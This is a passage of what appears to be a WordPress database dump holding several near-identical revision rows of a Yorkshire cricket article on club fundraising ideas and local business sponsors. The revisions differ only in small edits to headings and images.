Fete</strong> - needs a bit of organisation but can be a great day out for the family</li>\r\n 	<li style=\"text-align: left;\"><strong>Car boot sale</strong> - get rid of your unwanted things and make money for yourself and the club</li>\r\n 	<li style=\"text-align: left;\"><strong>Car wash</strong> - a bit of hard work will get the money rolling in</li>\r\n</ol>\r\n<h3>Keeping Cricket Going</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for the generosity of their sponsors. Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\r\n</em>\r\n\r\n<strong>Other Businesses who are interested in Yorkshire Cricket include:</strong>\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:45:48','2017-07-03 15:45:48','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(60,1,'2017-07-03 15:46:37','2017-07-03 15:46:37','<h3 style=\"text-align: left;\"><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-14 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" /></a>How Can Clubs Make Money?</h3>\r\n<p style=\"text-align: left;\">Cricket Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events. Fundraising can take a lot of time and effort but if everyone pitches in you can see how every little helps! See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\"><strong>Here are some more popular ways to raise funds:</strong></p>\r\n\r\n<ol>\r\n 	<li style=\"text-align: left;\"><strong>Sponsored Challenge</strong> - you can be sponsored for literally anything! From sponsored silence to a sky dive....</li>\r\n 	<li style=\"text-align: left;\"><strong>Quiz Night</strong> - a fun way to spend time in the club bar and make money too!</li>\r\n 	<li style=\"text-align: left;\"><strong>Raffle</strong> - always a popular choice</li>\r\n 	<li style=\"text-align: left;\"><strong>Summer Fete</strong> - needs a bit of organisation but can be a great day out for the family</li>\r\n 	<li style=\"text-align: left;\"><strong>Car boot sale</strong> - get rid of your unwanted things and make money for yourself and the club</li>\r\n 	<li style=\"text-align: left;\"><strong>Car wash</strong> - a bit of hard work will get the money rolling in</li>\r\n</ol>\r\n<h3>Local Businesses Support Cricket in Yorkshire</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for the generosity of their sponsors. Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\r\n</em>\r\n\r\n<strong>Other Businesses who are interested in Yorkshire Cricket include:</strong>\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:46:37','2017-07-03 15:46:37','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(61,1,'2017-07-03 15:47:28','2017-07-03 15:47:28','<h3 style=\"text-align: left;\"><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-14 \" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"326\" height=\"211\" /></a>How Can Clubs Make Money?</h3>\r\n<p style=\"text-align: left;\">Cricket Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events.</p>\r\n<p style=\"text-align: left;\">Fundraising can take a lot of time and effort but if everyone pitches in you can see how every little helps! See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\"><strong>Here are some more popular ways to raise funds:</strong></p>\r\n\r\n<ol>\r\n 	<li style=\"text-align: left;\"><strong>Sponsored Challenge</strong> - you can be sponsored for literally anything! From sponsored silence to a sky dive....</li>\r\n 	<li style=\"text-align: left;\"><strong>Quiz Night</strong> - a fun way to spend time in the club bar and make money too!</li>\r\n 	<li style=\"text-align: left;\"><strong>Raffle</strong> - always a popular choice</li>\r\n 	<li style=\"text-align: left;\"><strong>Summer Fete</strong> - needs a bit of organisation but can be a great day out for the family</li>\r\n 	<li style=\"text-align: left;\"><strong>Car boot sale</strong> - get rid of your unwanted things and make money for yourself and the club</li>\r\n 	<li style=\"text-align: left;\"><strong>Car wash</strong> - a bit of hard work will get the money rolling in</li>\r\n</ol>\r\n<h3>Local Businesses Support Cricket in Yorkshire</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for the generosity of their sponsors. Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\r\n</em>\r\n\r\n<strong>Other Businesses who are interested in Yorkshire Cricket include:</strong>\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:47:28','2017-07-03 15:47:28','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(62,1,'2017-07-03 15:48:08','2017-07-03 15:48:08','<h3 style=\"text-align: left;\"><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-14 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" /></a>How Can Clubs Make Money?</h3>\r\n<p style=\"text-align: left;\">Cricket Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events.</p>\r\n<p style=\"text-align: left;\">Fundraising can take a lot of time and effort but if everyone pitches in you can see how every little helps! See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\"><strong>Here are some more popular ways to raise funds:</strong></p>\r\n\r\n<ol>\r\n 	<li style=\"text-align: left;\"><strong>Sponsored Challenge</strong> - you can be sponsored for literally anything! From sponsored silence to a sky dive....</li>\r\n 	<li style=\"text-align: left;\"><strong>Quiz Night</strong> - a fun way to spend time in the club bar and make money too!</li>\r\n 	<li style=\"text-align: left;\"><strong>Raffle</strong> - always a popular choice</li>\r\n 	<li style=\"text-align: left;\"><strong>Summer Fete</strong> - needs a bit of organisation but can be a great day out for the family</li>\r\n 	<li style=\"text-align: left;\"><strong>Car boot sale</strong> - get rid of your unwanted things and make money for yourself and the club</li>\r\n 	<li style=\"text-align: left;\"><strong>Car wash</strong> - a bit of hard work will get the money rolling in</li>\r\n</ol>\r\n<h3>Local Businesses Support Cricket in Yorkshire</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for the generosity of their sponsors. Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\r\n</em>\r\n\r\n<strong>Other Businesses who are interested in Yorkshire Cricket include:</strong>\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:48:08','2017-07-03 15:48:08','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(63,1,'2017-07-03 15:48:31','2017-07-03 15:48:31','<h3 style=\"text-align: left;\"><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-14 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" /></a>How Can Clubs Make Money?</h3>\r\n<p style=\"text-align: left;\">Cricket Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events.</p>\r\n<p style=\"text-align: left;\">Fundraising can take a lot of time and effort but if everyone pitches in you can see how every little helps!</p>\r\n<p style=\"text-align: left;\">See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n<p style=\"text-align: left;\"><strong>Here are some more popular ways to raise funds:</strong></p>\r\n\r\n<ol>\r\n 	<li style=\"text-align: left;\"><strong>Sponsored Challenge</strong> - you can be sponsored for literally anything! From sponsored silence to a sky dive....</li>\r\n 	<li style=\"text-align: left;\"><strong>Quiz Night</strong> - a fun way to spend time in the club bar and make money too!</li>\r\n 	<li style=\"text-align: left;\"><strong>Raffle</strong> - always a popular choice</li>\r\n 	<li style=\"text-align: left;\"><strong>Summer Fete</strong> - needs a bit of organisation but can be a great day out for the family</li>\r\n 	<li style=\"text-align: left;\"><strong>Car boot sale</strong> - get rid of your unwanted things and make money for yourself and the club</li>\r\n 	<li style=\"text-align: left;\"><strong>Car wash</strong> - a bit of hard work will get the money rolling in</li>\r\n</ol>\r\n<h3>Local Businesses Support Cricket in Yorkshire</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for the generosity of their sponsors. Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\r\n</em>\r\n\r\n<strong>Other Businesses who are interested in Yorkshire Cricket include:</strong>\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:48:31','2017-07-03 15:48:31','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(64,1,'2017-07-03 15:48:53','2017-07-03 15:48:53','<h3 style=\"text-align: left;\"><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-14 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" /></a>How Can Clubs Make Money?</h3>\r\n<p style=\"text-align: left;\">Cricket Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events.</p>\r\n<p style=\"text-align: left;\">Fundraising can take a lot of time and effort but if everyone pitches in you can see how every little helps!</p>\r\n<p style=\"text-align: left;\">See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n\r\n<h3 style=\"text-align: left;\"><strong>Here are some popular ways to raise funds:</strong></h3>\r\n<ol>\r\n 	<li style=\"text-align: left;\"><strong>Sponsored Challenge</strong> - you can be sponsored for literally anything! From sponsored silence to a sky dive....</li>\r\n 	<li style=\"text-align: left;\"><strong>Quiz Night</strong> - a fun way to spend time in the club bar and make money too!</li>\r\n 	<li style=\"text-align: left;\"><strong>Raffle</strong> - always a popular choice</li>\r\n 	<li style=\"text-align: left;\"><strong>Summer Fete</strong> - needs a bit of organisation but can be a great day out for the family</li>\r\n 	<li style=\"text-align: left;\"><strong>Car boot sale</strong> - get rid of your unwanted things and make money for yourself and the club</li>\r\n 	<li style=\"text-align: left;\"><strong>Car wash</strong> - a bit of hard work will get the money rolling in</li>\r\n</ol>\r\n<h3>Local Businesses Support Cricket in Yorkshire</h3>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for the generosity of their sponsors. Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\r\n</em>\r\n\r\n<strong>Other Businesses who are interested in Yorkshire Cricket include:</strong>\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:48:53','2017-07-03 15:48:53','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(65,1,'2017-07-03 15:49:59','2017-07-03 15:49:59','<h3 style=\"text-align: left;\"><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-14 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/kids-cricket-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" /></a>How Can Clubs Make Money?</h3>\r\n<p style=\"text-align: left;\">Cricket Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events.</p>\r\n<p style=\"text-align: left;\">Fundraising can take a lot of time and effort but if everyone pitches in you can see how every little helps!</p>\r\n<p style=\"text-align: left;\">See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n\r\n<h3 style=\"text-align: left;\"><strong>Here are some popular ways to raise funds:</strong></h3>\r\n<ol>\r\n 	<li style=\"text-align: left;\"><strong>Sponsored Challenge</strong> - you can be sponsored for literally anything! From sponsored silence to a sky dive....</li>\r\n 	<li style=\"text-align: left;\"><strong>Quiz Night</strong> - a fun way to spend time in the club bar and make money too!</li>\r\n 	<li style=\"text-align: left;\"><strong>Raffle</strong> - always a popular choice</li>\r\n 	<li style=\"text-align: left;\"><strong>Summer Fete</strong> - needs a bit of organisation but can be a great day out for the family</li>\r\n 	<li style=\"text-align: left;\"><strong>Car boot sale</strong> - get rid of your unwanted things and make money for yourself and the club</li>\r\n 	<li style=\"text-align: left;\"><strong>Car wash</strong> - a bit of hard work will get the money rolling in</li>\r\n</ol>\r\n<h2>Local Businesses Support Cricket in Yorkshire</h2>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for the generosity of their sponsors. Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\r\n</em>\r\n\r\n<strong>Other Businesses who are interested in Yorkshire Cricket include:</strong>\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:49:59','2017-07-03 15:49:59','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(66,1,'2017-07-03 15:51:12','2017-07-03 15:51:12','<h3 style=\"text-align: left;\">How Can Clubs Make Money?</h3>\r\n<p style=\"text-align: left;\"><img class=\"size-medium wp-image-17 alignright\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/cricket-honours-300x233.jpg\" alt=\"\" width=\"300\" height=\"233\" />Cricket Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events.</p>\r\n<p style=\"text-align: left;\">Fundraising can take a lot of time and effort but if everyone pitches in you can see how every little helps!</p>\r\n<p style=\"text-align: left;\">See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n\r\n<h3 style=\"text-align: left;\"><strong>Here are some popular ways to raise funds:</strong></h3>\r\n<ol>\r\n 	<li style=\"text-align: left;\"><strong>Sponsored Challenge</strong> - you can be sponsored for literally anything! From sponsored silence to a sky dive....</li>\r\n 	<li style=\"text-align: left;\"><strong>Quiz Night</strong> - a fun way to spend time in the club bar and make money too!</li>\r\n 	<li style=\"text-align: left;\"><strong>Raffle</strong> - always a popular choice</li>\r\n 	<li style=\"text-align: left;\"><strong>Summer Fete</strong> - needs a bit of organisation but can be a great day out for the family</li>\r\n 	<li style=\"text-align: left;\"><strong>Car boot sale</strong> - get rid of your unwanted things and make money for yourself and the club</li>\r\n 	<li style=\"text-align: left;\"><strong>Car wash</strong> - a bit of hard work will get the money rolling in</li>\r\n</ol>\r\n<h2>Local Businesses Support Cricket in Yorkshire</h2>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for the generosity of their sponsors. Read more about the <a href=\"https://yorkshirecricketboard.org.uk/what-does-the-future-hold\" target=\"_blank\">future for Yorkshire Cricket here</a>.\r\n</em>\r\n\r\n<strong>Other Businesses who are interested in Yorkshire Cricket include:</strong>\r\n<ul>\r\n 	<li><a href=\"http://www.seabrookcrisps.com/\" target=\"_blank\">Seabrook Crisps</a></li>\r\n 	<li><a href=\"https://www.fireworksshop.uk.com/\" target=\"_blank\">The Fireworks Shop</a></li>\r\n 	<li><a href=\"https://www.tetley.co.uk/\" target=\"_blank\">Tetley Tea</a></li>\r\n 	<li><a href=\"http://www.kwiksave.co.uk/\" target=\"_blank\">Kwik Save</a></li>\r\n 	<li><a href=\"http://www.york-brewery.co.uk/\" target=\"_blank\">York Brewery</a></li>\r\n 	<li><a href=\"https://www.theakstons.co.uk/\" target=\"_blank\">Theakston Brewery</a></li>\r\n 	<li><a href=\"http://www.harrogatebus.co.uk/\" target=\"_blank\">Harrogate Bus Company</a></li>\r\n 	<li><a href=\"http://www.harrogatespring.com/\" target=\"_blank\">Harrogate Spring Water</a></li>\r\n 	<li><a href=\"http://www.ybs.co.uk/index.html\" target=\"_blank\">Yorkshire Building Society</a></li>\r\n 	<li><a href=\"http://www.whitby-seafoods.com/\" target=\"_blank\">Whitby Seafoods Ltd</a></li>\r\n</ul>\r\n<blockquote>\r\n<p style=\"text-align: left;\">If you are interested in supporting Cricket in Yorkshire, please <a href=\"https://yorkshirecricketboard.org.uk/contact-us\" target=\"_blank\">get in touch.</a></p>\r\n</blockquote>','Local Businesses Show Interest In Yorkshire Cricket','','inherit','closed','closed','','32-revision-v1','','','2017-07-03 15:51:12','2017-07-03 15:51:12','',32,'https://yorkshirecricketboard.org.uk/32-revision-v1',0,'revision','',0),(67,1,'2017-07-03 15:52:11','2017-07-03 15:52:11','<h3 style=\"text-align: left;\">How Can Clubs Make Money?</h3>\r\n<p style=\"text-align: left;\"><a href=\"https://yorkshirecricketboard.org.uk/championship-honours\"><img class=\"alignright wp-image-17 size-medium\" src=\"https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/cricket-honours-300x233.jpg\" alt=\"\" width=\"300\" height=\"233\" /></a>Cricket Clubs across the country have been looking at ways to increase their financial income and coming up with some great ideas such as selling merchandise and putting on events.</p>\r\n<p style=\"text-align: left;\">Fundraising can take a lot of time and effort but if everyone pitches in you can see how every little helps!</p>\r\n<p style=\"text-align: left;\">See how our friends in Kent <a href=\"http://kentcountycricket.co.uk/shopproducts-php\" target=\"_blank\">support their local cricket team.</a></p>\r\n\r\n<h3 style=\"text-align: left;\"><strong>Here are some popular ways to raise funds:</strong></h3>\r\n<ol>\r\n 	<li style=\"text-align: left;\"><strong>Sponsored Challenge</strong> - you can be sponsored for literally anything! From sponsored silence to a sky dive....</li>\r\n 	<li style=\"text-align: left;\"><strong>Quiz Night</strong> - a fun way to spend time in the club bar and make money too!</li>\r\n 	<li style=\"text-align: left;\"><strong>Raffle</strong> - always a popular choice</li>\r\n 	<li style=\"text-align: left;\"><strong>Summer Fete</strong> - needs a bit of organisation but can be a great day out for the family</li>\r\n 	<li style=\"text-align: left;\"><strong>Car boot sale</strong> - get rid of your unwanted things and make money for yourself and the club</li>\r\n 	<li style=\"text-align: left;\"><strong>Car wash</strong> - a bit of hard work will get the money rolling in</li>\r\n</ol>\r\n<h2>Local Businesses Support Cricket in Yorkshire</h2>\r\nThe business and marketing side is now almost as important as the playing. <strong>Clubs could not survive without the revenue from advertising and sponsorship</strong> and the grant from the <a href=\"https://www.ecb.co.uk/\" target=\"_blank\">England and Wales Cricket Board</a>.\r\n\r\n<em>This is why teams are more grateful than ever for the generosity of their sponsors. Read more about the <a 